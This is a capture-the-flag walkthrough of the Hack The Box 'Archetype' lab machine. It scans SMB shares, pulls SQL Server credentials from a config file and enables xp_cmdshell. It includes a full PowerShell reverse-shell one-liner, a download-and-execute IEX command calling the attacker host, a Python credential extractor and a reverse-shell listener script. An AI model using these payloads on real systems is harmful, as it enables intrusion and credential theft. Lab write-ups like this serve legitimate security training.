Today we are going to dive into hacking. Hack The Box is a popular service where aspiring hackers and penetration testers practice their skills and solve challenges. Basically it is a treasure hunt: you hack the machines, find two flags (user and root) and submit them to complete the task.
Today we are solving the Archetype box, which is a Starting Point box (for me, at least). So let's exploit it.
Basic Information
IP address : 10.10.10.27
Release date : 188 days ago (as of writing)
User owns : 27875
System owns : 28366
Machine rating : 4.0
Created by : egre55
https://app.hackthebox.eu/users/1190
The steps will be:
- Information gathering
- Getting into the pilot seat (getting regular user access)
- Getting privileged user access
- Information Gathering
As they say, the more you know about the target, the more you know about how to exploit it.
So first we do some information gathering with Nmap. Nmap is a network mapper: an information-gathering tool used to discover hosts, open ports and the services behind them, and it is widely used in security auditing. We scan all 65535 TCP ports (-p-) with version detection (-sV):
- sudo nmap -p- -T4 -sV 10.10.10.27
Running this command shows that ports 139, 445 and 1433 are open. So I googled them to find out more about them.
- Ports 139/445: port 139 is the NetBIOS session service and port 445 carries SMB (Server Message Block), the Windows file and printer sharing protocol. This means the machine shares files with other machines on the network, which is great news for us.
- Port 1433: Microsoft SQL Server. So the machine also hosts a database, which is a great opportunity to establish a connection (hoping it accepts my proposal).
- Getting regular user access
Let's first focus on SMB. Kali Linux has a preinstalled tool called smbmap, which lists the shares a host exposes and the permissions we have on them. We try it with an empty username and password (a null session):
- smbmap -H 10.10.10.27 -u "" -p ""
This command shows two shares available with read access:
- IPC$: this hidden share is a special share used for inter-process communication. It does not give access to files or directories like other shares; instead it lets you talk to processes (named pipes) on the remote system.
- backups: a normal share with read access. It has no comment, so it could contain interesting data if we can connect to it.
Now we connect to "backups" with smbclient (-N skips the password prompt, since we are using the null session):
- smbclient -N //10.10.10.27/backups
The share contains a file called prod.dtsConfig. This is an SSIS (SQL Server Integration Services) package configuration file, and it holds a connection string with a user name and password for the SQL Server, which is exactly what we need to connect to port 1433.
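As an added example (not part of the original write-up), here is a small Python script that pulls credentials out of a .dtsConfig file so you do not have to eyeball the XML. It reads every Configuration element whose Path points at a ConnectionString, splits the OLE DB style "Key=Value;" string, and reports the User ID / Password pairs; connections that use Windows authentication (Integrated Security=SSPI) carry no password and are skipped. The sample file, its user name and its password are constructed placeholders, not the values from the box.

```python
import xml.etree.ElementTree as ET

# Constructed sample shaped like an SSIS package configuration (.dtsConfig).
# The user name and password are placeholders, not the values from the box.
SAMPLE_DTSCONFIG = """<?xml version="1.0"?>
<DTSConfiguration>
  <DTSConfigurationHeading>
    <DTSConfigurationFileInfo GeneratedBy="example" GeneratedFromPackageName="Package" GeneratedFromPackageID="{00000000-0000-0000-0000-000000000000}" GeneratedDate="1/1/2020 12:00:00 PM"/>
  </DTSConfigurationHeading>
  <Configuration ConfiguredType="Property" Path="\\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
    <ConfiguredValue>Data Source=.;Password=ExamplePassw0rd!;User ID=svc_example;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
  </Configuration>
  <Configuration ConfiguredType="Property" Path="\\Package.Connections[Source].Properties[ConnectionString]" ValueType="String">
    <ConfiguredValue>Data Source=.;Integrated Security=SSPI;Initial Catalog=Other;Provider=SQLNCLI10.1;</ConfiguredValue>
  </Configuration>
</DTSConfiguration>
"""


def parse_connection_string(value):
    """Split an OLE DB style 'Key=Value;Key=Value;' string into a dict.

    Keys are lower-cased so 'User ID' and 'user id' match; values keep their case.
    Items without '=' are ignored.
    """
    parts = {}
    for item in value.split(";"):
        if "=" not in item:
            continue
        key, _, val = item.partition("=")
        parts[key.strip().lower()] = val.strip()
    return parts


def extract_credentials(xml_text):
    """Return one dict per ConnectionString property that carries a password.

    Connections using Windows authentication (Integrated Security=SSPI) have no
    password in the file and are skipped, since there is nothing to reuse.
    """
    root = ET.fromstring(xml_text)
    found = []
    for cfg in root.iter("Configuration"):
        path = cfg.get("Path", "")
        if "ConnectionString" not in path:
            continue
        node = cfg.find("ConfiguredValue")
        if node is None or not node.text:
            continue
        kv = parse_connection_string(node.text)
        user = kv.get("user id") or kv.get("uid")
        password = kv.get("password") or kv.get("pwd")
        if user and password:
            found.append({
                "path": path,
                "user": user,
                "password": password,
                "data_source": kv.get("data source", ""),
            })
    return found


if __name__ == "__main__":
    import sys
    # Read a real file if one is given on the command line, else the sample above.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_DTSCONFIG
    for cred in extract_credentials(text):
        print(f"{cred['path']}: {cred['user']} / {cred['password']} (Data Source={cred['data_source']})")
```

Run it as `python3 dtsconfig_creds.py prod.dtsConfig` after pulling the file down with smbclient; with no argument it runs on the embedded sample. The Data Source value tells you which server the credentials were meant for ("." means the local instance, i.e. the box itself).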
To connect to port 1433 with those credentials we use Impacket's mssqlclient.py, where <username> is the User ID from the connection string (the tool prompts for the password):
- mssqlclient.py ARCHETYPE/<username>@10.10.10.27 -windows-auth
After connecting to the SQL Server we use the IS_SRVROLEMEMBER function to check whether this user is in the pilot seat (sysadmin) or not: SELECT IS_SRVROLEMEMBER('sysadmin'); returns 1 if it is.
This user has sysadmin privileges, so we can enable xp_cmdshell and gain command execution on the host.
SQL> EXEC sp_configure 'show advanced options', 1;
[*] INFO(ARCHETYPE): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL> reconfigure;
SQL> sp_configure;
SQL> EXEC sp_configure 'xp_cmdshell', 1;
[*] INFO(ARCHETYPE): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL> reconfigure;
SQL> xp_cmdshell "whoami"
whoami shows which Windows account our commands run as and whether it has admin privileges; here it does not.
So to get a proper pilot seat we will use a PowerShell reverse shell, saved as shell.ps1, and enumerate the system from there:
$client = New-Object System.Net.Sockets.TCPClient("10.10.14.3",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
To host the file we start a web server in the directory containing shell.ps1:
- python3 -m http.server 80
To catch the callback we listen with netcat on port 443 (allowing the box through ufw first, in case the firewall is active):
- sudo ufw allow from 10.10.10.27
- sudo rlwrap nc -nlvp 443
Now we submit a command through xp_cmdshell that downloads and executes the shell:
- xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.3/shell.ps1\");"
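Added example, not from the original write-up: a Python listener that speaks the same protocol as the one-liner above. The PowerShell script waits for a line, runs it with iex, and writes the output followed by "# ", so a handler that sends one command and then reads until that marker can script commands instead of typing them into nc. The fake_powershell_client function is a constructed stand-in for the PowerShell side (canned outputs instead of iex) so the exchange can be run offline on a localhost port; against the real box you would only use make_listener on port 443 and handle_callback.

```python
import socket
import threading

PROMPT = b"# "  # the one-liner appends "# " after every command's output


def make_listener(host="0.0.0.0", port=443, backlog=1):
    """Bind a TCP listener; port 0 lets the OS pick a free port (used by the demo)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(backlog)
    return srv


def recv_until_prompt(conn, prompt=PROMPT, bufsize=4096):
    """Read until the prompt marker arrives, then return the output without it."""
    data = b""
    while not data.endswith(prompt):
        chunk = conn.recv(bufsize)
        if not chunk:  # remote side closed: return whatever we got
            return data
        data += chunk
    return data[:-len(prompt)]


def run_command(conn, cmd):
    """Send one command line and return its decoded output."""
    conn.sendall(cmd.encode() + b"\n")
    return recv_until_prompt(conn).decode(errors="replace")


def handle_callback(srv, commands, timeout=10):
    """Accept a single reverse-shell connection and run each command in turn."""
    srv.settimeout(timeout)
    conn, _addr = srv.accept()
    with conn:
        conn.settimeout(timeout)
        return [run_command(conn, c) for c in commands]


def fake_powershell_client(port, host="127.0.0.1"):
    """Constructed stand-in for the PowerShell side, so the exchange runs offline.

    Like the one-liner it reads a command, 'executes' it (here a canned table
    instead of iex) and writes the output followed by '# '. The account name
    and host name are made up for the demo.
    """
    canned = {"whoami": "archetype\\example_user\r\n", "hostname": "ARCHETYPE\r\n"}
    with socket.create_connection((host, port)) as c:
        while True:
            data = c.recv(65536)
            if not data:
                break
            cmd = data.decode().strip()
            out = canned.get(cmd, f"'{cmd}' is not recognized\r\n")
            c.sendall(out.encode() + PROMPT)


def demo(commands=("whoami", "hostname")):
    """Run the listener against the fake client on an ephemeral localhost port."""
    srv = make_listener("127.0.0.1", 0)
    port = srv.getsockname()[1]
    threading.Thread(target=fake_powershell_client, args=(port,), daemon=True).start()
    try:
        return handle_callback(srv, list(commands))
    finally:
        srv.close()


if __name__ == "__main__":
    # Against a real target: srv = make_listener("0.0.0.0", 443); handle_callback(srv, [...])
    cmds = ["whoami", "hostname"]
    for cmd, out in zip(cmds, demo(cmds)):
        print(f"> {cmd}\n{out}", end="")
```

Reading until the "# " marker is what keeps the outputs of consecutive commands from running together; rlwrap nc gives you line editing and history instead, which is the better choice for interactive use. Binding port 443 needs root, which is why the netcat line above uses sudo.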
The shell connects back, and we can read the user flag from the user's Desktop.